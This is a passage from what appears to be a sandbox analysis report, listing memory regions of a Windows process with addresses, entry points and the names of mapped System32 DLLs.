0x7ff86ef1efff monitored = 0 entry_point = 0x7ff86ef14960 region_type = mapped_file name = "nci.dll" filename = "\\Windows\\System32\\nci.dll" (normalized: "c:\\windows\\system32\\nci.dll") Region: id = 1608 start_va = 0x7ff86efa0000 end_va = 0x7ff86efb0fff monitored = 0 entry_point = 0x7ff86efa2fc0 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 1609 start_va = 0x7ff86f0c0000 end_va = 0x7ff86f0fffff monitored = 0 entry_point = 0x7ff86f0ccbe0 region_type = mapped_file name = "adsldpc.dll" filename = "\\Windows\\System32\\adsldpc.dll" (normalized: "c:\\windows\\system32\\adsldpc.dll") Region: id = 1610 start_va = 0x7ff86f100000 end_va = 0x7ff86f146fff monitored = 0 entry_point = 0x7ff86f101d10 region_type = mapped_file name = "activeds.dll" filename = "\\Windows\\System32\\activeds.dll" (normalized: "c:\\windows\\system32\\activeds.dll") Region: id = 1611 start_va = 0x7ff86f220000 end_va = 0x7ff86f236fff monitored = 0 entry_point = 0x7ff86f226620 region_type = mapped_file name = "msauserext.dll" filename = "\\Windows\\System32\\msauserext.dll" (normalized: "c:\\windows\\system32\\msauserext.dll") Region: id = 1612 start_va = 0x7ff86f240000 end_va = 0x7ff86f281fff monitored = 0 entry_point = 0x7ff86f243670 region_type = mapped_file name = "wdscore.dll" filename = "\\Windows\\System32\\wdscore.dll" (normalized: "c:\\windows\\system32\\wdscore.dll") Region: id = 1613 start_va = 0x7ff86f390000 end_va = 0x7ff86f3aefff monitored = 0 entry_point = 0x7ff86f3937e0 region_type = mapped_file name = "netsetupapi.dll" filename = "\\Windows\\System32\\NetSetupApi.dll" (normalized: "c:\\windows\\system32\\netsetupapi.dll") Region: id = 1614 start_va = 0x7ff86f3b0000 end_va = 0x7ff86f428fff monitored = 0 entry_point = 0x7ff86f3b76a0 region_type = mapped_file name = "netsetupshim.dll" filename = "\\Windows\\System32\\NetSetupShim.dll" (normalized: "c:\\windows\\system32\\netsetupshim.dll") Region: id = 1615 start_va = 0x7ff86f430000 end_va = 0x7ff86f437fff monitored = 0 entry_point = 0x7ff86f4313b0 region_type = mapped_file name = "dmiso8601utils.dll" filename = "\\Windows\\System32\\dmiso8601utils.dll" (normalized: "c:\\windows\\system32\\dmiso8601utils.dll") Region: id = 1616 start_va = 0x7ff86f4a0000 end_va = 0x7ff86f542fff monitored = 0 entry_point = 0x7ff86f4a2c10 region_type = mapped_file name = "clusapi.dll" filename = "\\Windows\\System32\\clusapi.dll" (normalized: "c:\\windows\\system32\\clusapi.dll") Region: id = 1617 start_va = 0x7ff86f550000 end_va = 0x7ff86f5a1fff monitored = 0 entry_point = 0x7ff86f555770 region_type = mapped_file name = "resutils.dll" filename = "\\Windows\\System32\\resutils.dll" (normalized: "c:\\windows\\system32\\resutils.dll") Region: id = 1618 start_va = 0x7ff86f5b0000 end_va = 0x7ff86f5ddfff monitored = 1 entry_point = 0x7ff86f5b2300 region_type = mapped_file name = "wmidcom.dll" filename = "\\Windows\\System32\\wmidcom.dll" (normalized: "c:\\windows\\system32\\wmidcom.dll") Region: id = 1619 start_va = 0x7ff86f5e0000 end_va = 0x7ff86f63dfff monitored = 0 entry_point = 0x7ff86f5e5080 region_type = mapped_file name = "miutils.dll" filename = "\\Windows\\System32\\miutils.dll" (normalized: "c:\\windows\\system32\\miutils.dll") Region: id = 1620 start_va = 0x7ff86f640000 end_va = 0x7ff86f65ffff monitored = 0 entry_point = 0x7ff86f641f50 region_type = mapped_file name = "mi.dll" filename = "\\Windows\\System32\\mi.dll" (normalized: "c:\\windows\\system32\\mi.dll") Region: id = 1621 start_va = 0x7ff86f660000 end_va = 0x7ff86f668fff monitored = 0 entry_point = 0x7ff86f6618f0 region_type = mapped_file name = "sscoreext.dll" filename = "\\Windows\\System32\\sscoreext.dll" (normalized: "c:\\windows\\system32\\sscoreext.dll") Region: id = 1622 start_va = 0x7ff86f670000 end_va = 0x7ff86f680fff monitored = 0 entry_point = 0x7ff86f671d30 region_type = mapped_file name = "sscore.dll" filename = "\\Windows\\System32\\sscore.dll" (normalized: "c:\\windows\\system32\\sscore.dll") Region: id = 1623 start_va = 0x7ff86f6a0000 end_va = 0x7ff86f6b7fff monitored = 0 entry_point = 0x7ff86f6a4e10 region_type = mapped_file name = "adhsvc.dll" filename = "\\Windows\\System32\\adhsvc.dll" (normalized: "c:\\windows\\system32\\adhsvc.dll") Region: id = 1624 start_va = 0x7ff86f6c0000 end_va = 0x7ff86f6e4fff monitored = 0 entry_point = 0x7ff86f6c5ca0 region_type = mapped_file name = "httpprxm.dll" filename = "\\Windows\\System32\\httpprxm.dll" (normalized: "c:\\windows\\system32\\httpprxm.dll") Region: id = 1625 start_va = 0x7ff870370000 end_va = 0x7ff8703b0fff monitored = 0 entry_point = 0x7ff870373750 region_type = mapped_file name = "sqmapi.dll" filename = "\\Windows\\System32\\sqmapi.dll" (normalized: "c:\\windows\\system32\\sqmapi.dll") Region: id = 1626 start_va = 0x7ff8703c0000 end_va = 0x7ff8704b2fff monitored = 0 entry_point = 0x7ff8703e5d80 region_type = mapped_file name = "iphlpsvc.dll" filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll") Region: id = 1627 start_va = 0x7ff8704c0000 end_va = 0x7ff87050bfff monitored = 0 entry_point = 0x7ff8704d5310 region_type = mapped_file name = "srvsvc.dll" filename = "\\Windows\\System32\\srvsvc.dll" (normalized: "c:\\windows\\system32\\srvsvc.dll") Region: id = 1628 start_va = 0x7ff870690000 end_va = 0x7ff8706a7fff monitored = 0 entry_point = 0x7ff870692000 region_type = mapped_file name = "vsstrace.dll" filename = "\\Windows\\System32\\vsstrace.dll" (normalized: "c:\\windows\\system32\\vsstrace.dll") Region: id = 1629 start_va = 0x7ff8706b0000 end_va = 0x7ff870831fff monitored = 0 entry_point = 0x7ff8706c82a0 region_type = mapped_file name = "vssapi.dll" filename = "\\Windows\\System32\\vssapi.dll" (normalized: "c:\\windows\\system32\\vssapi.dll") Region: id = 1630 start_va = 0x7ff870c70000 end_va = 0x7ff870ceefff monitored = 0 entry_point = 0x7ff870c87110 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 1631 start_va = 0x7ff870cf0000 end_va = 0x7ff870d2bfff monitored = 0 entry_point = 0x7ff870cf6aa0 region_type = mapped_file name = "wmisvc.dll" filename = "\\Windows\\System32\\wbem\\WMIsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wmisvc.dll") Region: id = 1632 start_va = 0x7ff870d80000 end_va = 0x7ff870d89fff monitored = 0 entry_point = 0x7ff870d81350 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 1633 start_va = 0x7ff870dc0000 end_va = 0x7ff870dcbfff monitored = 0 entry_point = 0x7ff870dc35c0 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 1634 start_va = 0x7ff872410000 end_va = 0x7ff872418fff monitored = 0 entry_point = 0x7ff8724121d0 region_type = mapped_file name = "httpprxc.dll" filename = "\\Windows\\System32\\httpprxc.dll" (normalized: "c:\\windows\\system32\\httpprxc.dll") Region: id = 1635 start_va = 0x7ff872420000 end_va = 0x7ff872454fff monitored = 0 entry_point = 0x7ff87242a270 region_type = mapped_file name = "fwpolicyiomgr.dll" filename = "\\Windows\\System32\\fwpolicyiomgr.dll" (normalized: "c:\\windows\\system32\\fwpolicyiomgr.dll") Region: id = 1636 start_va = 0x7ff872540000 end_va = 0x7ff8727b9fff monitored = 0 entry_point = 0x7ff87255a7a0 region_type = mapped_file name = "msxml6.dll" filename = "\\Windows\\System32\\msxml6.dll" (normalized: "c:\\windows\\system32\\msxml6.dll") Region: id = 1637 start_va = 0x7ff8727c0000 end_va = 0x7ff8727fffff monitored = 0 entry_point = 0x7ff8727d6c60 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 1638 start_va = 0x7ff872a20000 end_va = 0x7ff872a32fff monitored = 0 entry_point = 0x7ff872a21b10 region_type = mapped_file name = "devrtl.dll" filename = "\\Windows\\System32\\devrtl.dll" (normalized: "c:\\windows\\system32\\devrtl.dll") Region: id = 1639 start_va = 0x7ff872a40000 end_va = 0x7ff872ac1fff monitored = 0 entry_point = 0x7ff872a41790 region_type = mapped_file name = "newdev.dll" filename = "\\Windows\\System32\\newdev.dll" (normalized: "c:\\windows\\system32\\newdev.dll") Region: id = 1640 start_va = 0x7ff872ad0000 end_va = 0x7ff872e09fff monitored = 0 entry_point = 0x7ff872ad8520 region_type = mapped_file name = "msi.dll" filename = "\\Windows\\System32\\msi.dll" (normalized: "c:\\windows\\system32\\msi.dll") Region: id = 1641 start_va = 0x7ff872e10000 end_va = 0x7ff872e93fff monitored = 0 entry_point = 0x7ff872e22830 region_type = mapped_file name = "winspool.drv" filename = "\\Windows\\System32\\winspool.drv" (normalized: "c:\\windows\\system32\\winspool.drv") Region: id = 1642 start_va = 0x7ff872ea0000 end_va = 0x7ff872f04fff monitored = 0 entry_point = 0x7ff872eb3170 region_type = mapped_file name = "wuuhext.dll" filename = "\\Windows\\System32\\wuuhext.dll" (normalized: "c:\\windows\\system32\\wuuhext.dll") Region: id = 1643 start_va = 0x7ff872f10000 end_va = 0x7ff873208fff monitored = 0 entry_point = 0x7ff872fd7280 region_type = mapped_file name = "esent.dll" filename = "\\Windows\\System32\\esent.dll" (normalized: "c:\\windows\\system32\\esent.dll") Region: id = 1644 start_va = 0x7ff873210000 end_va = 0x7ff873445fff monitored = 0 entry_point = 0x7ff87329a450 region_type = mapped_file name = "wuaueng.dll" filename = "\\Windows\\System32\\wuaueng.dll" (normalized: "c:\\windows\\system32\\wuaueng.dll") Region: id = 1645 start_va = 0x7ff873450000 end_va = 0x7ff873471fff monitored = 0 entry_point = 0x7ff873462540 region_type = mapped_file name = "updatepolicy.dll" filename = "\\Windows\\System32\\updatepolicy.dll" (normalized: "c:\\windows\\system32\\updatepolicy.dll") Region: id = 1646 start_va = 0x7ff873480000 end_va = 0x7ff873554fff monitored = 0 entry_point = 0x7ff87349cf80 region_type = mapped_file name = "wuapi.dll" filename = "\\Windows\\System32\\wuapi.dll" (normalized: "c:\\windows\\system32\\wuapi.dll") Region: id = 1647 start_va = 0x7ff873970000 end_va = 0x7ff873985fff monitored = 0 entry_point = 0x7ff87397b550 region_type = mapped_file name = "clipc.dll" filename = "\\Windows\\System32\\Clipc.dll" (normalized: "c:\\windows\\system32\\clipc.dll") Region: id = 1648 start_va = 0x7ff8744b0000 end_va = 0x7ff8744c1fff monitored = 0 entry_point = 0x7ff8744b3580 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\System32\\cscapi.dll" (normalized: "c:\\windows\\system32\\cscapi.dll") Region: id = 1649 start_va = 0x7ff874540000 end_va = 0x7ff87455afff monitored = 0 entry_point = 0x7ff874541040 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 1650 start_va = 0x7ff874830000 end_va = 0x7ff874839fff monitored = 0 entry_point = 0x7ff8748314c0 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 1651 start_va = 0x7ff874a90000 end_va = 0x7ff874a9dfff monitored = 0 entry_point = 0x7ff874a91460 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 1652 start_va = 0x7ff874aa0000 end_va = 0x7ff874aaffff monitored = 0 entry_point = 0x7ff874aa1700 region_type = mapped_file name = "proximityservicepal.dll" filename = "\\Windows\\System32\\ProximityServicePal.dll" (normalized: "c:\\windows\\system32\\proximityservicepal.dll") Region: id = 1653 start_va = 0x7ff874ab0000 end_va = 0x7ff874ac4fff monitored = 0 entry_point = 0x7ff874ab2dc0 region_type = mapped_file name = "ondemandconnroutehelper.dll" filename = "\\Windows\\System32\\OnDemandConnRouteHelper.dll" (normalized: "c:\\windows\\system32\\ondemandconnroutehelper.dll") Region: id = 1654 start_va = 0x7ff874ad0000 end_va = 0x7ff874ad8fff monitored = 0 entry_point = 0x7ff874ad1ed0 region_type = mapped_file name = "proximitycommonpal.dll" filename = "\\Windows\\System32\\ProximityCommonPal.dll" (normalized: "c:\\windows\\system32\\proximitycommonpal.dll") Region: id = 1655 start_va = 0x7ff874ae0000 end_va = 0x7ff874b0cfff monitored = 0 entry_point = 0x7ff874ae2290 region_type = mapped_file name = "proximitycommon.dll" filename = "\\Windows\\System32\\ProximityCommon.dll" (normalized: "c:\\windows\\system32\\proximitycommon.dll") Region: id = 1656 start_va = 0x7ff874b10000 end_va = 0x7ff874b61fff monitored = 0 entry_point = 0x7ff874b138e0 region_type = mapped_file name = "proximityservice.dll" filename = "\\Windows\\System32\\ProximityService.dll" (normalized: "c:\\windows\\system32\\proximityservice.dll") Region: id = 1657 start_va = 0x7ff874d60000 end_va = 0x7ff874d74fff monitored = 0 entry_point = 0x7ff874d63460 region_type = mapped_file name = "ssdpapi.dll" filename = "\\Windows\\System32\\ssdpapi.dll" (normalized: "c:\\windows\\system32\\ssdpapi.dll") Region: id = 1658 start_va = 0x7ff874e50000 end_va = 0x7ff874f0ffff monitored = 0 entry_point = 0x7ff874e7fd20 region_type = mapped_file name = "fveapi.dll" filename = "\\Windows\\System32\\fveapi.dll" (normalized: "c:\\windows\\system32\\fveapi.dll") Region: id = 1659 start_va = 0x7ff874f10000 end_va = 0x7ff874fa9fff monitored = 0 entry_point = 0x7ff874f2ada0 region_type = mapped_file name = "shsvcs.dll" filename = "\\Windows\\System32\\shsvcs.dll" (normalized: "c:\\windows\\system32\\shsvcs.dll") Region: id = 1660 start_va = 0x7ff874fc0000 end_va = 0x7ff875026fff monitored = 0 entry_point = 0x7ff874fc63e0 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 1661 start_va = 0x7ff875080000 end_va = 0x7ff8750c0fff monitored = 0 entry_point = 0x7ff875084840 region_type = mapped_file name = "usermgrproxy.dll" filename = "\\Windows\\System32\\UserMgrProxy.dll" (normalized: "c:\\windows\\system32\\usermgrproxy.dll") Region: id = 1662 start_va = 0x7ff8750d0000 end_va = 0x7ff8750dafff monitored = 0 entry_point = 0x7ff8750d1d30 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 1663 start_va = 0x7ff875200000 end_va = 0x7ff87522dfff monitored = 0 entry_point = 0x7ff875207550 region_type = mapped_file name = "netjoin.dll" filename = "\\Windows\\System32\\netjoin.dll" (normalized: "c:\\windows\\system32\\netjoin.dll") Region: id = 1664 start_va = 0x7ff875230000 end_va = 0x7ff875245fff monitored = 0 entry_point = 0x7ff875231b60 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 1665 start_va = 0x7ff875250000 end_va = 0x7ff875269fff monitored = 0 entry_point = 0x7ff875252430 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 1666 start_va = 0x7ff875270000 end_va = 0x7ff875285fff monitored = 0 entry_point = 0x7ff8752719f0 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 1667 start_va = 0x7ff875290000 end_va = 0x7ff87529cfff monitored = 0 entry_point = 0x7ff875292ca0 region_type = mapped_file name = "csystemeventsbrokerclient.dll" filename = "\\Windows\\System32\\CSystemEventsBrokerClient.dll" (normalized: "c:\\windows\\system32\\csystemeventsbrokerclient.dll") Region: id = 1668 start_va = 0x7ff8752a0000 end_va = 0x7ff8752cefff monitored = 0 entry_point = 0x7ff8752a8910 region_type = mapped_file name = "wptaskscheduler.dll" filename = "\\Windows\\System32\\WPTaskScheduler.dll" (normalized: "c:\\windows\\system32\\wptaskscheduler.dll") Region: id = 1669 start_va = 0x7ff875320000 end_va = 0x7ff875405fff monitored = 0 entry_point = 0x7ff87533cf10 region_type = mapped_file name = "usermgr.dll" filename = "\\Windows\\System32\\usermgr.dll" (normalized: "c:\\windows\\system32\\usermgr.dll") Region: id = 1670 start_va = 0x7ff875480000 end_va = 0x7ff8754b7fff monitored = 0 entry_point = 0x7ff875498cc0 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 1671 start_va = 0x7ff875560000 end_va = 0x7ff875573fff monitored = 0 entry_point = 0x7ff875562d50 region_type = mapped_file name = "rtutils.dll" filename = "\\Windows\\System32\\rtutils.dll" (normalized: "c:\\windows\\system32\\rtutils.dll") Region: id = 1672 start_va = 0x7ff875860000 end_va = 0x7ff8758f2fff monitored = 0 entry_point = 0x7ff875869680 region_type = mapped_file name = "msvcp_win.dll" filename = "\\Windows\\System32\\msvcp_win.dll" (normalized: "c:\\windows\\system32\\msvcp_win.dll") Region: id = 1673 start_va = 0x7ff875a10000 end_va = 0x7ff875a28fff monitored = 0 entry_point = 0x7ff875a14520 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 1674 start_va = 0x7ff875a30000 end_va = 0x7ff875a3afff monitored = 0 entry_point = 0x7ff875a31de0 region_type = mapped_file name = "bitsperf.dll" filename = "\\Windows\\System32\\bitsperf.dll" (normalized: "c:\\windows\\system32\\bitsperf.dll") Region: id = 1675 start_va = 0x7ff875b40000 end_va = 0x7ff875b4ffff monitored = 0 entry_point = 0x7ff875b42c60 region_type = mapped_file name = "usermgrcli.dll" filename = "\\Windows\\System32\\usermgrcli.dll" (normalized: "c:\\windows\\system32\\usermgrcli.dll") Region: id = 1676 start_va = 0x7ff875c60000 end_va = 0x7ff875ccdfff monitored = 0 entry_point = 0x7ff875c67f60 region_type = mapped_file name = "taskcomp.dll" filename = "\\Windows\\System32\\taskcomp.dll" (normalized: "c:\\windows\\system32\\taskcomp.dll") Region: id = 1677 start_va = 0x7ff875d20000 end_va = 0x7ff875d30fff monitored = 0 entry_point = 0x7ff875d23320 region_type = mapped_file name = "wmiclnt.dll" filename = "\\Windows\\System32\\wmiclnt.dll" (normalized: "c:\\windows\\system32\\wmiclnt.dll") Region: id = 1678 start_va = 0x7ff875d40000 end_va = 0x7ff875d80fff monitored = 0 entry_point = 0x7ff875d57eb0 region_type = mapped_file name = "ubpm.dll" filename = "\\Windows\\System32\\ubpm.dll" (normalized: "c:\\windows\\system32\\ubpm.dll") Region: id = 1679 start_va = 0x7ff875d90000 end_va = 0x7ff875e8bfff monitored = 0 entry_point = 0x7ff875dc6df0 region_type = mapped_file name = "schedsvc.dll" filename = "\\Windows\\System32\\schedsvc.dll" (normalized: "c:\\windows\\system32\\schedsvc.dll") Region: id = 1680 start_va = 0x7ff8764e0000 end_va = 0x7ff876861fff monitored = 0 entry_point = 0x7ff876531220 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 1681 start_va = 0x7ff876870000 end_va = 0x7ff8769a5fff monitored = 0 entry_point = 0x7ff87689f350 region_type = mapped_file name = "wintypes.dll" filename = "\\Windows\\System32\\WinTypes.dll" (normalized: "c:\\windows\\system32\\wintypes.dll") Region: id = 1682 start_va = 0x7ff877aa0000 end_va = 0x7ff877badfff monitored = 0 entry_point = 0x7ff877aeeaa0 region_type = mapped_file name = "mrmcorer.dll" filename = "\\Windows\\System32\\MrmCoreR.dll" (normalized: "c:\\windows\\system32\\mrmcorer.dll") Region: id = 1683 start_va = 0x7ff878150000 end_va = 0x7ff87815bfff monitored = 0 entry_point = 0x7ff878152830 region_type = mapped_file name = "bi.dll" filename = "\\Windows\\System32\\bi.dll" (normalized: "c:\\windows\\system32\\bi.dll") Region: id = 1684 start_va = 0x7ff878230000 end_va = 0x7ff8782eefff monitored = 0 entry_point = 0x7ff878251c50 region_type = mapped_file name = "taskschd.dll" filename = "\\Windows\\System32\\taskschd.dll" (normalized: "c:\\windows\\system32\\taskschd.dll") Region: id = 1685 start_va = 0x7ff878310000 end_va = 0x7ff878326fff monitored = 0 entry_point = 0x7ff878315630 region_type = mapped_file name = "sens.dll" filename = "\\Windows\\System32\\Sens.dll" (normalized: "c:\\windows\\system32\\sens.dll") Region: id = 1686 start_va = 0x7ff878330000 end_va = 0x7ff8783ddfff monitored = 0 entry_point = 0x7ff8783480c0 region_type = mapped_file name = "windows.networking.connectivity.dll" filename = "\\Windows\\System32\\Windows.Networking.Connectivity.dll" (normalized: "c:\\windows\\system32\\windows.networking.connectivity.dll") Region: id = 1687 start_va = 0x7ff8783e0000 end_va = 0x7ff8783f1fff monitored = 0 entry_point = 0x7ff8783e9260 region_type = mapped_file name = "rilproxy.dll" filename = "\\Windows\\System32\\rilproxy.dll" (normalized: "c:\\windows\\system32\\rilproxy.dll") Region: id = 1688 start_va = 0x7ff878400000 end_va = 0x7ff8784b0fff monitored = 0 entry_point = 0x7ff8784788b0 region_type = mapped_file name = "cellularapi.dll" filename = "\\Windows\\System32\\CellularAPI.dll" (normalized: "c:\\windows\\system32\\cellularapi.dll") Region: id = 1689 start_va = 0x7ff8784c0000 end_va = 0x7ff8784e4fff monitored = 0 entry_point = 0x7ff8784d2f20 region_type = mapped_file name = "wificonnapi.dll" filename = "\\Windows\\System32\\wificonnapi.dll" (normalized: "c:\\windows\\system32\\wificonnapi.dll") Region: id = 1690 start_va = 0x7ff8784f0000 end_va = 0x7ff878500fff monitored = 0 entry_point = 0x7ff8784f7ea0 region_type = mapped_file name = "dcpapi.dll" filename = "\\Windows\\System32\\dcpapi.dll" (normalized: "c:\\windows\\system32\\dcpapi.dll") Region: id = 1691 start_va = 0x7ff878510000 end_va = 0x7ff87854dfff monitored = 0 entry_point = 0x7ff87851a050 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 1692 start_va = 0x7ff878550000 end_va = 0x7ff878576fff monitored = 0 entry_point = 0x7ff878553bf0 region_type = mapped_file name = "profsvcext.dll" filename = "\\Windows\\System32\\profsvcext.dll" (normalized: "c:\\windows\\system32\\profsvcext.dll") Region: id = 1693 start_va = 0x7ff878580000 end_va = 0x7ff8785f9fff monitored = 0 entry_point = 0x7ff8785a7630 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 1694 start_va = 0x7ff878600000 end_va = 0x7ff878612fff monitored = 0 entry_point = 0x7ff8786057f0 region_type = mapped_file name = "themeservice.dll" filename = "\\Windows\\System32\\themeservice.dll" (normalized: "c:\\windows\\system32\\themeservice.dll") Region: id = 1695 start_va = 0x7ff878620000 end_va = 0x7ff878639fff monitored = 0 entry_point = 0x7ff878622cf0 region_type = mapped_file name = "locationpelegacywinlocation.dll" filename = "\\Windows\\System32\\LocationPeLegacyWinLocation.dll" (normalized: "c:\\windows\\system32\\locationpelegacywinlocation.dll") Region: id = 1696 start_va = 0x7ff878640000 end_va = 0x7ff878694fff monitored = 0 entry_point = 0x7ff87864fc00 region_type = mapped_file name = "profsvc.dll" filename = "\\Windows\\System32\\profsvc.dll" (normalized: "c:\\windows\\system32\\profsvc.dll") Region: id = 1697 start_va = 0x7ff8786a0000 end_va = 0x7ff8786a9fff monitored = 0 entry_point = 0x7ff8786a1660 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 1698 start_va = 0x7ff8786b0000 end_va = 0x7ff8786c7fff monitored = 0 entry_point = 0x7ff8786b5910 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 1699 start_va = 0x7ff8786d0000 end_va = 0x7ff87881cfff monitored = 0 entry_point = 0x7ff878713da0 region_type = mapped_file name = "gpsvc.dll" filename = "\\Windows\\System32\\gpsvc.dll" (normalized: "c:\\windows\\system32\\gpsvc.dll") Region: id = 1700 start_va = 0x7ff878820000 end_va = 0x7ff87882bfff monitored = 0 entry_point = 0x7ff8788214d0 region_type = mapped_file name = "locationframeworkps.dll" filename = "\\Windows\\System32\\LocationFrameworkPS.dll" (normalized: "c:\\windows\\system32\\locationframeworkps.dll") Region: id = 1701 start_va = 0x7ff878830000 end_va = 0x7ff878884fff monitored = 0 entry_point = 0x7ff878833fb0 region_type = mapped_file name = "policymanager.dll" filename = "\\Windows\\System32\\policymanager.dll" (normalized: "c:\\windows\\system32\\policymanager.dll") Region: id = 1702 start_va = 0x7ff878890000 end_va = 0x7ff8788c6fff monitored = 0 entry_point = 0x7ff878896020 region_type = mapped_file name = "gnssadapter.dll" filename = "\\Windows\\System32\\GnssAdapter.dll" (normalized: "c:\\windows\\system32\\gnssadapter.dll") Region: id = 1703 start_va = 0x7ff8788d0000 end_va = 0x7ff8788effff monitored = 0 entry_point = 0x7ff8788d39a0 region_type = mapped_file name = "locationwinpalmisc.dll" filename = "\\Windows\\System32\\LocationWinPalMisc.dll" (normalized: "c:\\windows\\system32\\locationwinpalmisc.dll") Region: id = 1704 start_va = 0x7ff8788f0000 end_va = 0x7ff878953fff monitored = 0 entry_point = 0x7ff878905ae0 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 1705 start_va = 0x7ff878b20000 end_va = 0x7ff878be7fff monitored = 0 entry_point = 0x7ff878b613f0 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 1706 start_va = 0x7ff878bf0000 end_va = 0x7ff878c50fff monitored = 0 entry_point = 0x7ff878bf4b50 region_type = mapped_file name = "wlanapi.dll" filename = "\\Windows\\System32\\wlanapi.dll" (normalized: "c:\\windows\\system32\\wlanapi.dll") Region: id = 1707 start_va = 0x7ff878c60000 end_va = 0x7ff878ddbfff monitored = 0 entry_point = 0x7ff878cb1650 region_type = mapped_file name = "locationframework.dll" filename = "\\Windows\\System32\\LocationFramework.dll" (normalized: "c:\\windows\\system32\\locationframework.dll") Region: id = 1708 start_va = 0x7ff878de0000 end_va = 0x7ff878deafff monitored = 0 entry_point = 0x7ff878de1770 region_type = mapped_file name = "lfsvc.dll" filename = "\\Windows\\System32\\lfsvc.dll" (normalized: "c:\\windows\\system32\\lfsvc.dll") Region: id = 1709 start_va = 0x7ff878e80000 end_va = 0x7ff878f11fff monitored = 0 entry_point = 0x7ff878eca780 region_type = mapped_file name = "msvcp110_win.dll" filename = "\\Windows\\System32\\msvcp110_win.dll" (normalized: "c:\\windows\\system32\\msvcp110_win.dll") Region: id = 1710 start_va = 0x7ff878fc0000 end_va = 0x7ff878fe8fff monitored = 0 entry_point = 0x7ff878fcca00 region_type = mapped_file name = "cabinet.dll" filename = "\\Windows\\System32\\cabinet.dll" (normalized: "c:\\windows\\system32\\cabinet.dll") Region: id = 1711 start_va = 0x7ff878ff0000 end_va = 0x7ff879025fff monitored = 0 entry_point = 0x7ff879000070 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 1712 start_va = 0x7ff879c90000 end_va = 0x7ff87a122fff monitored = 0 entry_point = 0x7ff879c9f760 region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll") Region: id = 1713 start_va = 0x7ff87a130000 end_va = 0x7ff87a196fff monitored = 0 entry_point = 0x7ff87a14e710 region_type = mapped_file name = "bcp47langs.dll" filename = "\\Windows\\System32\\BCP47Langs.dll" (normalized: "c:\\windows\\system32\\bcp47langs.dll") Region: id = 1714 start_va = 0x7ff87a1f0000 end_va = 0x7ff87a1f7fff monitored = 0 entry_point = 0x7ff87a1f13e0 region_type = mapped_file name = "dabapi.dll" filename = "\\Windows\\System32\\dabapi.dll" (normalized: "c:\\windows\\system32\\dabapi.dll") Region: id = 1715 start_va = 0x7ff87aa90000 end_va = 0x7ff87ab08fff monitored = 0 entry_point = 0x7ff87aaafb90 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll") Region: id = 1716 start_va = 0x7ff87ab10000 end_va = 0x7ff87ac95fff monitored = 0 entry_point = 0x7ff87ab5d700 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 1717 start_va = 0x7ff87aca0000 end_va = 0x7ff87acbbfff monitored = 0 entry_point = 0x7ff87aca37a0 region_type = mapped_file name = "samlib.dll" filename = 